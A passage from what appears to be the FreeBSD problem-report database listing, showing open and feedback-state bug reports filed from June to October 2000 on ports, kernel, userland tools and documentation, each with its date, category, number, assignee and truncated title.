sanpei not-existing PCMCI cards in pccard.conf.s o [2000/06/13] bin/19239 login allows users to login remotely with o [2000/06/13] misc/19246 ports Poor error message when fetching files wi o [2000/06/13] ports/19253 dirk mod_php4 has pkg dependency when not usin o [2000/06/14] ports/19270 asami Ports build mechanism doesn't check wheth o [2000/06/15] ports/19325 tom ports/mail/ezmlm-idx: mysql & pgsql suppo o [2000/06/15] gnu/19326 obrien Fix GCC Target Macro 'i386/freebsd.h'. o [2000/06/15] gnu/19327 obrien Fix to build 'a.out' binary. o [2000/06/16] ports/19333 cwt patch to make amanda24 more userfriendly o [2000/06/16] bin/19337 obrien c89(1) not POSIX compliant (-l lib) and m o [2000/06/17] bin/19355 fstat gives signal 10 (SIGBUS) when outpu o [2000/06/18] i386/19365 gj lnc1 is not worked with Am79C973 o [2000/06/18] misc/19367 markm /etc/defaults/make.conf lists wrong value o [2000/06/18] bin/19369 Inadequate error reporting in "mount" com o [2000/06/19] misc/19391 marcel Evilness with Linux Terminus, causes X to o [2000/06/20] ports/19403 ports portsifying of the glide3 source for dri o [2000/06/20] bin/19404 /usr/bin/error should be included in the o [2000/06/20] misc/19406 setenv() allocates memory which is not fr o [2000/06/20] i386/19410 spontaneous reboot when esd runs on a -ST o [2000/06/21] conf/19413 Too few MCAM SCSI devices in /dev o [2000/06/21] bin/19422 users can overflow argv to make ps segfau o [2000/06/22] ports/19434 obrien ports/mail/mutt dumps core o [2000/06/22] kern/19436 when using vlanX interface arp ageing wor o [2000/06/22] conf/19442 can't install on diverse harddisks. o [2000/06/22] ports/19448 markm filename input broken o [2000/06/22] ports/19456 chuckr the sp port is hardwired to install it's o [2000/06/22] ports/19457 vanilla The gimp port has /usr/local/bin hardwire o [2000/06/23] misc/19462 using HARP atm driver on FreeBSD3.4 freez o [2000/06/23] misc/19467 kris OpenSSH (as an rsync tunnel) blocks forev o [2000/06/23] docs/19481 doc Serial Communications chapter in Handbook o [2000/06/24] ports/19486 stb net/netatalk fix PLIST o [2000/06/24] kern/19490 faith0 network device has high number of o [2000/06/25] kern/19497 Adaptec AHA-1530P PNP scsi card is not re o [2000/06/25] ports/19498 kris ssh (1) instal fails o [2000/06/26] bin/19514 patch to prevent tail'ing directories o [2000/06/26] ports/19523 billf Update port: graphics/gd o [2000/06/26] bin/19532 cdcontrol does not handle EOF on stdin pr o [2000/06/26] kern/19535 adrian procfs_rlimit tidyup o [2000/06/26] bin/19536 patch to prevent head'ing directories o [2000/06/26] ports/19539 obrien ports/editors/vim-lite cannot deinstall p o [2000/06/27] kern/19541 Want to marge ds1 sound card driver from o [2000/06/27] kern/19546 No CD audio o [2000/06/27] kern/19553 "panic: zone: entry not free" in namei() o [2000/06/28] bin/19558 amd doesn't know whether NFS feature is a o [2000/06/28] misc/19564 PNP-Id for ESS1681 o [2000/06/28] ports/19571 tg python/TKinter busy waits f [2000/06/28] conf/19573 Dot Files for Optional Shells o [2000/06/29] i386/19574 Let badsect recognize character device. o [2000/06/29] misc/19576 obrien [patch] add magic to file(1) to recognise o [2000/06/29] ports/19585 obrien bounce port misconfiguration o [2000/06/29] ports/19591 ports ssh2 port ignores 'ignorenologin' from lo o [2000/06/29] bin/19592 imp pccard_ether does not honor dhcp_{program f [2000/06/30] ports/19594 trevor update port: qrash o [2000/06/30] bin/19598 traceroutes default of 30 Hops is too low o [2000/07/01] kern/19624 make {DFL,MAX}SSIZ kernel options o [2000/07/01] bin/19635 add -c for grand total to df(1), like du( o [2000/07/02] ports/19641 jfitz Newer version of swatch available o [2000/07/02] gnu/19642 kbyanc patch to merge OpenBSD changes to patch(1 o [2000/07/02] ports/19650 asami python package causes segmentation fault f [2000/07/02] ports/19659 ports erlang port: proposal for updating the mn o [2000/07/03] misc/19670 jkh Incorrect duplicate in fortunes2 o [2000/07/03] bin/19683 green mount displays incorrect mount point on f o [2000/07/03] kern/19686 yokota splash screen fails o [2000/07/03] kern/19688 jlemon Some boundry checking KASSERTS in network o [2000/07/05] kern/19706 Framing error on PC/NET 32 also used in o o [2000/07/05] ports/19713 max Update port lang/swi-pl to CFLAGS safeten o [2000/07/05] bin/19719 imp pccard_ether lacks the start_if hooks as o [2000/07/05] kern/19720 kbyanc more sysctl signed-ness patches o [2000/07/05] misc/19725 4.0-STABLE: sys/boot/ficl build fails if o [2000/07/06] gnu/19733 obrien GDB 4.18 is not GDB 4.18 o [2000/07/07] bin/19755 nologin not configurable o [2000/07/07] kern/19756 sheldonh Inability to use linux extended partition o [2000/07/07] ports/19757 obrien Update port: http://home.sol.no/~sverrehu o [2000/07/07] bin/19772 df output wrong for union-mounts o [2000/07/07] ports/19780 stb SETI@home port startup script fails o [2000/07/08] kern/19782 dirk mkisofs 1.12.1 (i386-unknown-freebsd4.0) o [2000/07/08] ports/19784 obrien comms/minicom v. 1.83.1 has the wrong che f [2000/07/09] misc/19798 cg 4DWAVE doesn't work. o [2000/07/09] misc/19805 not installable on old-fashioned dx50 o [2000/07/09] ports/19806 swallace error message w/xcdplayer: ioctl (cdromr f [2000/07/09] kern/19807 incorrect dates o [2000/07/09] ports/19812 mharo [PATCH] LDAP support for proftpd o [2000/07/10] docs/19818 doc /usr/share/man/man8/sysinstall.8 missing o [2000/07/10] ports/19823 obrien gnucache build depends on unimplemented s o [2000/07/10] kern/19827 yokota psm flag bit9(NOIDPROBE) doesn't work cor o [2000/07/10] misc/19837 murray Run Fit it floppy from serial port o [2000/07/11] conf/19849 MAKEDEV still defaults to da0X instead of f [2000/07/11] ports/19854 ports [PATCH] inclusion of full mozart-oz docum o [2000/07/11] kern/19863 markm Non-blocking IO not supported on /dev/ran o [2000/07/12] kern/19865 sos atapi-cd.c does not check CDIOCREADSUBCHA o [2000/07/12] ports/19868 asami modify ports/Mk/bsd.port.mk to remove ALL o [2000/07/12] kern/19871 select on named pipes always returns 'ava o [2000/07/13] kern/19887 mjacob Boot hang while scanning SCSI bus o [2000/07/13] i386/19890 davidn Stallion serial driver support missing [p o [2000/07/13] bin/19897 gshapiro Allow building more then 1 SENDMAIL_CF o [2000/07/14] kern/19913 des add SYN+FIN counter o [2000/07/15] kern/19966 new syscons screensaver o [2000/07/16] misc/19971 asmodai bug in /usr/include/sys/socket.h o [2000/07/16] i386/19972 Add of pckg (several pkgs) aborted, error o [2000/07/17] ports/19977 rse mod_php3 and mod_php4 ports doesn't recog o [2000/07/17] docs/19981 doc Indonesian translations o [2000/07/18] gnu/20004 obrien FBSD4 gcc __attribute__(constructor) not f [2000/07/18] misc/20007 mharo du -hcs * gives different wrong results d o [2000/07/18] misc/20024 jake [PATCH] queue(3) concatenation macros o [2000/07/18] kern/20029 des linprocfs does not accurately emulate Lin o [2000/07/19] bin/20042 "rsh -t" doesn't timeout if rcmd(3) never o [2000/07/19] alpha/20047 alpha FreeBSD does not yet support system type o [2000/07/20] bin/20054 ftpd: rotating _PATH_FTPDSTATFILE losts x o [2000/07/20] docs/20067 doc src/sbin/nologin/nologin.5 is bad place o [2000/07/20] bin/20074 darrenr enable STATETOP for ipfstat (ipfilter) o [2000/07/20] bin/20078 obrien No problem o [2000/07/23] docs/20121 jim Better user ppp documentation in man page o [2000/07/23] ports/20122 obrien update pgcc to 2.95.3 o [2000/07/23] misc/20131 obrien Suggested additions to `magic' file o [2000/07/24] misc/20139 msmith Simple typo in src/share/examples/ppi/ppi o [2000/07/24] ports/20145 dburr improving the devel/SN port o [2000/07/24] bin/20154 quiting more/less on the console early le o [2000/07/24] misc/20159 strftime() can't produce ISO8601 format t o [2000/07/24] kern/20161 cg Integrate VIA VT82C686 AC'97 audio driver o [2000/07/24] bin/20165 markm PERL_THREADED=true fails; "yes" works; ma o [2000/07/24] misc/20166 billf Corrections & additions to games/quiz/dat f [2000/07/25] ports/20170 ports [PATCH] fvwm2-beta update o [2000/07/25] ports/20171 andreas postgresql7 user message contains $PREFIX o [2000/07/25] ports/20179 nbm Follow up on ports/20168 o [2000/07/25] ports/20186 nbm New port: fdp-tools o [2000/07/25] bin/20188 brian tcpdump -d enables promisc mode on tun0 a o [2000/07/26] ports/20196 jfitz update: x11-toolkits/p5-Tk to nonbeta f [2000/07/26] kern/20198 luigi log setup of dynamic rules for ipfw o [2000/07/26] conf/20202 darrenr ipfilter hooks in rc.network o [2000/07/26] bin/20204 ps more doesn't handle 8-bit characters prop o [2000/07/27] kern/20214 dec kernel routing bug for nexthop is routed o [2000/07/27] kern/20231 non existing kernel files found in conf/f o [2000/07/28] ports/20240 obrien Update port: net/netcat has bogus master- o [2000/07/28] misc/20254 jhb BTX loader 1.00 can not recognize floppy o [2000/07/28] kern/20255 cg [PATCH] resume from suspend breaks pcm o [2000/07/28] ports/20267 chuckr Update port: print/transfig to 3.2.3c o [2000/07/28] ports/20270 reg libtool needlessly runs ldconfig after in o [2000/07/28] kern/20278 cg YMF724 initialization fails on my environ s [2000/07/29] docs/20294 darrenr ipf(5) defines icmp rule twice f [2000/07/29] bin/20295 fdisk -s give incorrect disk size o [2000/07/29] kern/20297 cg Joystick is not enabled with es1370 based o [2000/07/30] ports/20301 billf New port: irc/ircd-hybrid6 o [2000/07/30] ports/20307 obrien [PATCH] editors/vim5 PLIST needs fix o [2000/07/31] bin/20311 markm src/release/Makefile: broken CHECKSUM.MD5 o [2000/07/31] misc/20326 marcel [PATCH] installkernel fails if DESTDIR is o [2000/07/31] misc/20333 sheldonh ftp login fails on unix password when s/k o [2000/08/01] ports/20344 ports [PATCH] Port for QDraw-0.7.tar.gz o [2000/08/01] bin/20345 brian screensaver wont come on if pppctl is run o [2000/08/01] kern/20352 yokota Configuring a synaptics touchpad o [2000/08/01] misc/20354 sos interrupting burncd with ^C o [2000/08/02] ports/20356 mharo Update port: ftp/proftpd o [2000/08/02] ports/20359 ports New port: Apache-mod_perl_guide o [2000/08/02] ports/20364 dburr audio/ripit-atapi can use 'dagrab' instea o [2000/08/02] bin/20371 obrien dhclient inserts bogus configurations o [2000/08/03] kern/20384 n_hibma Phase errors with Zip650 CD on USB o [2000/08/03] kern/20389 ken "device pass" required for CD ripping o [2000/08/03] bin/20391 jhb sysinstall should check debug.boothowto s o [2000/08/03] kern/20393 dillon processes get stuck in vmwait instead of o [2000/08/04] docs/20400 doc Building a kernel with debugging info sec o [2000/08/04] bin/20402 ache 4.1R's ls conflicts with Emacs' dired mod o [2000/08/04] misc/20408 Distribution CDs will not boot on IBM Thi o [2000/08/04] kern/20410 sio support for high speed NS16550A, ST16 o [2000/08/05] conf/20436 asmodai Can't make only cd0 under 4.1-STABLE o [2000/08/05] kern/20437 sos IDE on Intel 815E looks like Intel ICH (y o [2000/08/06] kern/20448 luigi expired dynamic rules shown in "ipfw get" o [2000/08/07] misc/20457 davidn pw command doesn't generate random passwo o [2000/08/07] ports/20464 ports Port update of grace to 5.1.1 (included u o [2000/08/07] kern/20473 itojun socket(AF_INET, SOCK_RAW, 4) no longer wo o [2000/08/07] misc/20474 jkh Spelling fixes to fortune data file o [2000/08/07] misc/20475 mjacob SES/SAF-TE giving bogus temps on JMR ELEC o [2000/08/08] conf/20479 updates for rc.conf.5 manpage o [2000/08/08] i386/20485 AdvanSys ISA probe problems in 4.1-R GENE o [2000/08/08] ports/20491 ports AbiWord-0.7.10 fails to compile on FreeBS o [2000/08/09] conf/20498 brian All FreeBSD systems trigger massive late- o [2000/08/09] ports/20499 obrien [PATCH] conserver port doesn't like MD5 c o [2000/08/09] bin/20501 extra flag to dump to offline autoloaders o [2000/08/09] misc/20502 assar kerberos5 w/o kerberos4 attempts to build o [2000/08/09] misc/20504 assar [PATCH] ssh (openssh) cannot connect to s o [2000/08/10] ports/20520 will New port: lang/mercury o [2000/08/10] bin/20527 ume redundant binaries for similar IPv4 and I o [2000/08/10] docs/20528 doc sysconf(3) manpage doesn't mention posix. s [2000/08/10] kern/20529 billf gigabit cards fail to link o [2000/08/11] i386/20537 msmith HP NetRAID controller error when rebootin o [2000/08/12] ports/20561 dburr [PATCH] x11-fonts/sharefonts typo fix o [2000/08/12] ports/20565 torstenb [PATCH] More docs for postfix o [2000/08/12] bin/20569 sos libvgl tries to free global array o [2000/08/13] ports/20577 thepish update x11-toolkits/xmhtml, please close f [2000/08/13] ports/20582 will New port: tuxracer (3d penguin racing gam o [2000/08/13] ports/20587 ports Update port: upsd-2.0.1.6 o [2000/08/13] ports/20588 ports New port: upsd100-2.0.1.6(sysutils/upsd10 o [2000/08/14] bin/20600 net getpeereid obtains credentials from conne o [2000/08/14] ports/20601 ports DESTDIR and /etc/shells o [2000/08/14] ports/20610 ports New port of cgoban2 o [2000/08/14] kern/20611 VLAN parent device does not count VLAN ou o [2000/08/15] bin/20613 des fetch -T n is not timeout correctly when f [2000/08/15] docs/20626 des fetch(3) omits some of the env. vars unde o [2000/08/15] ports/20627 jseger tcl83 build is broken o [2000/08/16] bin/20643 dwmalone /usr/bin/kzip is obsolete; remove it? o [2000/08/16] ports/20644 ports Installation of port DAP requires compat3 o [2000/08/16] ports/20658 chuckr Update port: graphics/xpdf to 0.91 o [2000/08/16] i386/20660 wpaul if_wi provides 802.11 src and dst, not et o [2000/08/16] ports/20662 ports New port of viewkit f [2000/08/16] ports/20665 ports [PATCH] Update PORTVERSION for JadeTeX po o [2000/08/16] kern/20670 imp No PC-CARD Slots; Device Not Configured o [2000/08/17] ports/20678 asami make SORTED_MASTER_SITES_CMD variable ove o [2000/08/17] bin/20681 des [PATCH] show service names in netstat and f [2000/08/17] ports/20693 ports Two patches for fxtv o [2000/08/18] bin/20696 Pkg_add does not make use of HTTP_PROXY / o [2000/08/18] conf/20698 cg pcm device o [2000/08/19] ports/20722 ports New port: x11-fonts/jmk-x11-fonts o [2000/08/19] ports/20723 murray [PATCH] Update port: eterm 0.9 o [2000/08/20] ports/20730 peter Update Squid 2.3-STABLE4 with latest vend o [2000/08/20] i386/20731 cg syslog reports pcm0: hwptr went backwards f [2000/08/20] ports/20737 ports audio/cdrdao test for pccts has a LOCALBA o [2000/08/20] docs/20738 doc correction and modification to clocks(7) o [2000/08/21] bin/20742 ps Weird problem with 'more' on 4-1-STABLE o [2000/08/21] ports/20749 stb [PATCH] ports/mail/cyrus update f [2000/08/21] ports/20760 ports unfetchable mail for a resource which is f [2000/08/21] misc/20773 Can NOT run PS after upgrade using CTM o [2000/08/22] conf/20774 sheldonh 'NFS access cache time=2' is not a daemon f [2000/08/22] misc/20778 aio_write function cannot be used. o [2000/08/22] kern/20781 ESS Solo is not listed in supported sound o [2000/08/22] ports/20793 ports (socket-server) of clisp does not create o [2000/08/23] docs/20794 doc Request 2 good documents under people.fre o [2000/08/23] ports/20795 msmith FBSD 4.x: Citrix client with drive mappin o [2000/08/23] bin/20799 davidn top's problem o [2000/08/23] i386/20803 mdodd ep0 driver finds additional "shadow" ep c o [2000/08/23] kern/20804 deadlocking when using vnode disk file an o [2000/08/23] misc/20808 ps netstat -m doesn't use -N or -M arguments o [2000/08/23] misc/20812 obrien Magic file missing EPS binary document su f [2000/08/23] misc/20813 use "|more" will lost one line of datas o [2000/08/24] ports/20821 jmz [PATCH] XDM PAM support should not requir o [2000/08/24] bin/20824 ftpd returns, "ad0s1a: not a plain file." o [2000/08/24] bin/20827 billf pkg_add -r only fetchs one-level deep dep o [2000/08/24] misc/20830 lile kernel link problems with Olicom token ri o [2000/08/25] kern/20834 sos Patches and remarks ASUS A7V onboard Prom o [2000/08/25] i386/20845 Cyclades cy driver incompatible with Cycl o [2000/08/25] ports/20849 dec fix port: net/gated o [2000/08/25] ports/20851 torstenb Update port: audio/mpegaudio o [2000/08/26] bin/20858 sos libvgl does not handle fonts wider than 8 o [2000/08/26] kern/20878 wpaul Patch to add support for the 3c556B MiniP o [2000/08/26] ports/20880 ports new fvwm2-beta port o [2000/08/26] bin/20881 kris There's no reason not to build DNSsec-DSA o [2000/08/27] ports/20884 sobomax py-MySQLdb checksums are broken o [2000/08/27] ports/20888 stb [PATCH] Miscellaneous fixes for the cyrus o [2000/08/27] bin/20889 dwmalone syslogd.c still uses depreciated domain A o [2000/08/27] misc/20891 cg Suspend/Resume does not work for the YMF7 s [2000/08/28] misc/20906 darrenr [PATCH] typo in ipmon.8 o [2000/08/28] bin/20908 murray /stand/sysinstall too limited in selectio o [2000/08/29] misc/20920 yokota window(1) interferes with screensaver o [2000/08/29] misc/20921 yokota `Splash' screen fails to display splash.b f [2000/08/29] kern/20927 ume dmesg output: looutput: mbuf allocation f o [2000/08/30] bin/20944 ru natd enhancements, default config file an o [2000/08/30] bin/20949 marcel openssl build references non-buildtool, w o [2000/08/30] docs/20950 kris [PATCH] openssl.1 has bogus section title o [2000/08/31] ports/20964 ports New port: databases/hypersonicsql o [2000/08/31] ports/20968 ports Remove port: graphics/pnmtopng o [2000/08/31] ports/20970 andreas Remove port: print/ghostscript5 o [2000/08/31] ports/20975 ports update math/grace f [2000/09/01] kern/20992 kern/tty_subr.c, b_to_q to a clist with n o [2000/09/02] bin/20993 many ftpd commands not limited to logins f [2000/09/02] ports/20995 sheldonh freeciv-civ gtk make problem. o [2000/09/02] bin/20996 kris permissions on /usr/bin/opiepasswd f [2000/09/02] ports/20997 ports [PATCH] Man page, install enhancements fo f [2000/09/02] ports/20998 ports [PATCH] Enhancements for Xfstt port o [2000/09/02] ports/20999 jmz [PATCH] fix messages in mtools port a [2000/09/02] kern/21000 sheldonh 4.1-STABLE doesn't have card ID f [2000/09/02] ports/21003 ports New Port, modification of tcopy f [2000/09/02] bin/21007 wollman Improve/fix error messages in lpr's recvj o [2000/09/02] bin/21008 sheldonh Fix for lpr's handling of lots of jobs in a [2000/09/03] bin/21017 sheldonh mtree "no such file" message at job's end a [2000/09/04] ports/21021 ports graphics/quickpics bogus colorspace error o [2000/09/04] bin/21024 pow() ERANGE bug f [2000/09/04] gnu/21026 obrien gcc bug with -mno-ieee-fp and -march=pent o [2000/09/04] ports/21038 jseger CFengine doesn't install info files o [2000/09/04] kern/21051 Updating 4.1-RELEASE to -current fails be o [2000/09/04] ports/21052 jseger Update: x11/xscreensaver o [2000/09/05] conf/21059 marcel `make -jN buildkernel' can't keep source o [2000/09/05] conf/21066 Proposed change in rc scripts o [2000/09/05] misc/21070 marcel default setting of ${SUP} in Makefile.inc o [2000/09/06] bin/21074 davidn chkgrp vs group(5) inconsistency f [2000/09/06] bin/21075 sheldonh top: can't allocate sufficient memory o [2000/09/06] bin/21080 mjacob dump doesn't use eject tape device correc o [2000/09/06] ports/21081 andreas Update port: devel/SpecTcl o [2000/09/06] bin/21086 joe Annoying little bug using ls -G with f [2000/09/07] ports/21094 will New port: PHP 3.0.16 - standalone interpr o [2000/09/08] ports/21113 jeh New port; voicetronix unified telephony A o [2000/09/08] ports/21120 grog Update port: x11-servers/x2x o [2000/09/08] ports/21124 markm Updete port: x11-wm/gwm to 1.8d o [2000/09/08] gnu/21128 a proposed patch for uucp package o [2000/09/09] bin/21142 [PATCH] avoid errors from "make objlink" o [2000/09/09] bin/21144 des [PATCH] fetch(1): don't bonk if ftp SIZE o [2000/09/09] kern/21154 Change the name of *_saver.ko to saver_*. o [2000/09/09] kern/21156 yokota [PATCH] inconsistency in scmouse vs xterm o [2000/09/10] ports/21160 jseger A patch for editors/emacs20 XIM support s [2000/09/10] bin/21178 ken voltag selector, and unload support for c f [2000/09/10] ports/21179 will New port: math/gul-vdog-qt o [2000/09/11] ports/21211 rse the startup file installed by apache-mods o [2000/09/12] ports/21218 cwt amanda24 should config with --with-buffer o [2000/09/12] kern/21222 wrong behavior of concurrent mmap()s on N o [2000/09/12] kern/21229 Proper value for vfs.nfs.access_cache_tim o [2000/09/12] misc/21230 jhb The URL for splash window is gone o [2000/09/12] bin/21231 roberto the ntp HTML docs don't have the images o [2000/09/12] misc/21239 murray sysinstall doesn't know that block device f [2000/09/12] kern/21240 mbufs allocated to data is huge number in o [2000/09/12] misc/21241 MAKEDEV on fixit floppy should not reset o [2000/09/12] kern/21242 Koutech PCI dual port serial card patch o [2000/09/12] ports/21243 obrien lsof port fails if $(CC) has a space in i o [2000/09/12] ports/21244 will Update port: emulators/xmame f [2000/09/12] bin/21246 nvi's -c flag does no do what it is docum o [2000/09/13] misc/21255 phk /sbin/md5 suggestion o [2000/09/14] bin/21261 burncd blank fails f [2000/09/14] ports/21262 ports Fix port: mail/postfix-current o [2000/09/14] misc/21265 Not a bug, say: feature? o [2000/09/14] misc/21273 PLIP Configuration in sysinstall is broke f [2000/09/14] ports/21286 sobomax [PATCH] ports/graphics/tiff fix o [2000/09/15] misc/21287 "make all" for a jail build fails at lib/ o [2000/09/15] ports/21291 ports New port: Free EcmaScript Interpreter (fe o [2000/09/15] ports/21293 ports An emacs major mode for editing SGML and o [2000/09/15] ports/21296 torstenb [PATCH] INN port is outdated o [2000/09/15] misc/21298 tftpd problem "Socket operation on non-so o [2000/09/16] ports/21307 ports New ports: dsssl-docbook-cygnus-1.44(text o [2000/09/16] kern/21308 Sound Blaster 16 (using pcm) and new DEVF o [2000/09/16] misc/21310 Telnetd locks up when trying to connect v o [2000/09/16] bin/21312 more incorrectly redraws screen on xterm f [2000/09/16] ports/21313 ports vmwarIPv6 and vmware2 panic: Fatal trap 1 o [2000/09/16] bin/21315 Shells often behave oddly when executing o [2000/09/16] kern/21317 [PATCH] LINT and NOTES give false default a [2000/09/16] bin/21321 dougb [MFC] [PATCHES] Finish the job of conditi o [2000/09/17] ports/21327 jeh Initial ports entry for Bayonne IVR serve o [2000/09/17] conf/21339 kris ssh-keygen: not found o [2000/09/18] ports/21341 ports New port: devel/elib-emacs + devel/elib-e o [2000/09/18] ports/21344 fenner ports/benchmark/netperf missing checksum f [2000/09/18] ports/21346 ports ports/biology/platon o [2000/09/18] ports/21348 obrien ports/devel/pccts has a checksum error o [2000/09/18] ports/21351 jhb ports/emulators/bfe sourcetarball no long o [2000/09/18] misc/21354 FreeBSD4.1 + SMP + vinum = crashes o [2000/09/18] ports/21356 ports New port: mbone/rat30 (rat-3.0.35), the s s [2000/09/18] kern/21362 bmilekic Adds M_RDONLY to external storage mbufs o [2000/09/18] ports/21365 obrien Update port: comms/conserver o [2000/09/18] ports/21366 sobomax Update port: comms/mserver o [2000/09/18] ports/21368 flathill Update port: games/xosmulti s [2000/09/18] ports/21371 bp Update port: net/mars_nwe to 0.99.20 o [2000/09/18] ports/21372 nectar Update port: sysutils/doconfig o [2000/09/18] misc/21385 About daemon_saver o [2000/09/18] ports/21389 ports g2c libraries and compatibility for DJGPP o [2000/09/18] kern/21391 WARNING messages occur when bpf is used w o [2000/09/19] bin/21394 [PATCH] MAKEDEV creates rocketport specia o [2000/09/19] ports/21401 ports Update port sysutils/wmtop to 0.83 with f o [2000/09/19] kern/21402 marcel Linuxulator: getpgid(0) fails o [2000/09/19] kern/21405 Default module patch mismatch between ker o [2000/09/19] kern/21409 The ID for the VIA KT133 chipset is not i o [2000/09/19] kern/21410 sos ATA driver problems when UDMA66 is used w o [2000/09/20] ports/21413 ports New port: net/zebra-server o [2000/09/20] ports/21422 ports msql install fails looking for startup sc o [2000/09/20] ports/21435 ports New port Jakarta Ant (A Java based build o [2000/09/20] bin/21436 pkg_install will not compile without erro o [2000/09/20] ports/21439 ports FIX: mail/postfix-current o [2000/09/20] ports/21441 ports FIX: devel/pcre to install a working pgre o [2000/09/21] i386/21452 cg Add speaker volume adjusting support for f [2000/09/21] ports/21455 ports update graphics/giram to 0.1.7 o [2000/09/21] ports/21460 jseger Patch net/trafshow: Allow showing ipv6 p o [2000/09/22] ports/21473 dburr update devel/SN to 4.5.2, not from mainta o [2000/09/22] ports/21475 ports Port broken: xlockmore 4.17.2 o [2000/09/22] bin/21476 ftp in 4.1-STABLE fails on http:// URLs o [2000/09/22] ports/21477 ports New port: xmms-crossfade o [2000/09/22] conf/21489 /etc/pccard_ether feature request o [2000/09/22] ports/21491 billf Too old ethreal version, please update to o [2000/09/22] ports/21493 obrien Updated port emulators/spim 5.9 -> 6.2 o [2000/09/22] misc/21494 ftpd doesn't count o [2000/09/23] ports/21504 ports New port: korean/tin o [2000/09/23] ports/21507 lioux New port emulators/sope (Playstation(tm) o [2000/09/23] misc/21512 cdrdao fails to build with SCGLIB o [2000/09/23] ports/21513 ports stunnel port should be compiled using non o [2000/09/24] ports/21515 ports pine4 complains about wrong permissions o o [2000/09/24] ports/21516 ports New FreeBSD port for Fuzz o [2000/09/24] ports/21517 ports start|stop script for upsd (/usr/local/et o [2000/09/24] bin/21519 sys/dir.h should be deprecated some more o [2000/09/24] ports/21520 ports Configure the synaptics touchpad. o [2000/09/24] kern/21524 Crashs while using talk with another loca o [2000/09/24] ports/21526 billf update graphics/qiv to 1.5, non-maintaine o [2000/09/24] misc/21528 installworld fails in secure/usr.bin/open o [2000/09/24] bin/21531 csh/tcsh provide no way to see/adjust new o [2000/09/24] ports/21532 ports No formal mechanism in place for discussi o [2000/09/24] ports/21533 ports A homebrewer's recipe calculator o [2000/09/24] misc/21534 ipfw + bridging + 4.x release = crash o [2000/09/25] misc/21536 jkh [PATCH] Add Hungarian FTP mirror to sysin o [2000/09/25] ports/21541 ports Replacement for pr 21538 a [2000/09/25] docs/21542 asmodai sigaction(2) man page is misleading o [2000/09/25] ports/21545 ports emulators/vmware broken... o [2000/09/25] bin/21546 netstat -rn output needs netmask info add o [2000/09/25] conf/21551 /etc/services needs a kpop entry o [2000/09/25] ports/21555 msmith [PATCH] citrix_ica upgrade to version 6.0 o [2000/09/26] ports/21558 ports Skill fails to ID os and fails build f [2000/09/26] bin/21570 dougb [PATCH] Add -r option to /usr/bin/mail, q o [2000/09/26] ports/21575 jseger Update port: graphics/ImageMagick to 5.2. o [2000/09/26] ports/21584 ports mpd whines if kernel has option NETGRAPH o [2000/09/26] misc/21587 install problem in 4.1-Stable o [2000/09/27] ports/21594 ports New port: command line SMTP agent o [2000/09/27] ports/21598 ports port of wm x10 controller o [2000/09/27] ports/21602 ports misc/sls port lost distfile (by maintaine o [2000/09/27] ports/21604 ports new port: java/jad o [2000/09/28] ports/21621 reg Update port: devel/libtool to 1.3.5 o [2000/09/28] kern/21623 wpaul Chipset SiS630E / NIC SiS 900 o [2000/09/28] kern/21627 sos Chipset SiS630E / ATA SiS 5591 o [2000/09/28] misc/21629 jkh Duplicate fortune in fortune datafile s [2000/09/28] misc/21634 alex worms(6) ignores -d option s [2000/09/28] ports/21636 ade gnomelibs PLIST bug o [2000/09/28] misc/21639 It's to easy to accidently tag a pr as Co o [2000/09/29] misc/21644 /usr/include/sys/mman.h uses a type defin f [2000/09/29] conf/21649 brian [Patch] rc.conf knob for unaligned access o [2000/09/30] bin/21659 Berkeley db library is statically compile o [2000/09/30] bin/21661 kris SSH connections die when using some X11 a o [2000/09/30] ports/21664 ports port of gmail gnome email-client o [2000/10/01] i386/21672 AMD Duron Rev. A0 reports incorrect L2 ca o [2000/10/01] misc/21675 Better and more disktab entries for MO dr o [2000/10/01] ports/21681 ports the startup elisp file of PSGML port has o [2000/10/01] kern/21683 Unable to compile kernel after CVSUP. CVS o [2000/10/01] gnu/21685 remote gdb: ptrace(PT_GETDBREGS) failed: o [2000/10/02] ports/21691 ports New port: chinese/linux_base o [2000/10/02] conf/21695 ifconfig_XXX_aliasY in rc.conf; Y must be o [2000/10/02] misc/21699 sos ad4: READ command timeout - resetting\n a o [2000/10/02] docs/21700 bmah Description of SysKonnect Gigabit Etherne o [2000/10/02] ports/21705 ports CSCOPE writes incorrect offset into index o [2000/10/02] docs/21712 dan core(5) manpage fails to mention kern.sug o [2000/10/02] misc/21715 The freebsd mail list digifier loses MIME o [2000/10/02] ports/21719 nbm New Port: Courier Mail Suite o [2000/10/02] ports/21720 ports Update port to use ADNS. o [2000/10/03] conf/21722 The mixer settings are lost on sysetm reb o [2000/10/03] bin/21725 mtree follows symlinks! o [2000/10/03] misc/21728 KDE won't start with kernel_securelevel=" o [2000/10/03] kern/21737 sendto returns systematically EINVAL with o [2000/10/04] ports/21749 will Update port: audio/cd2mp3 Update to cd2m o [2000/10/04] bin/21751 ken libcam's cam_real_open_device() may lose o [2000/10/04] kern/21752 Infortrend IFT-3102 doesn't like SCSI Cac o [2000/10/04] kern/21754 Sound stops working when NetGear USB Devi o [2000/10/04] ports/21755 ports update editors/nano to 0.9.19 o [2000/10/04] ports/21759 ports New port: py-BisonGen-0.5.0 o [2000/10/04] ports/21760 ports New port: py-4Suite-0.9.0 o [2000/10/05] ports/21765 ports I cat't make ports using pw_gid) != typeof(group->g o [2000/10/22] bin/22211 typoed tar -c clobbers archives o [2000/10/22] ports/22217 ports [PATCH] UK phone codes out of date o [2000/10/22] kern/22228 Undocumented LINT option 'PANIC_REBOOT_WA o [2000/10/22] misc/22234 When using tun interface (user PPP), tcpd o [2000/10/22] misc/22235 ReadLine/ReadKey perl modules (part of CP s [2000/10/23] bin/22241 joe make wicontrol default to wi0 s [2000/10/23] kern/22244 wollman [MFC] Uninitialized field in radix_node s o [2000/10/23] ports/22250 jmacd Update port: lang/STK to 4.0.1 (fix ports o [2000/10/23] ports/22252 obrien Update port: lang/nawk to 2000.05.25 o [2000/10/23] ports/22255 chuckr Update port: print/transfig to 3.2.3c (fi o [2000/10/23] ports/22258 cwt adding a WITHOUT_PLOT option to the misc/ o [2000/10/23] gnu/22259 root directory change directory bug o [2000/10/23] ports/22260 ports Update for tkgate port o [2000/10/23] misc/22261 access.sample refers to sendmail.cw inste o [2000/10/23] misc/22262 virtusertable.sample refers to sendmail.c o [2000/10/24] bin/22270 [patch] /usr/bin/top wraps wrong w/SMP on o [2000/10/24] ports/22276 ports update to ports tree for mp3_check o [2000/10/24] ports/22277 ports Port Licq 0.85 with qt2.2.0--Messages get o [2000/10/24] misc/22278 rmuser does not allow deletion of all use o [2000/10/24] bin/22279 stock perl5 build does not support %Z spe o [2000/10/24] 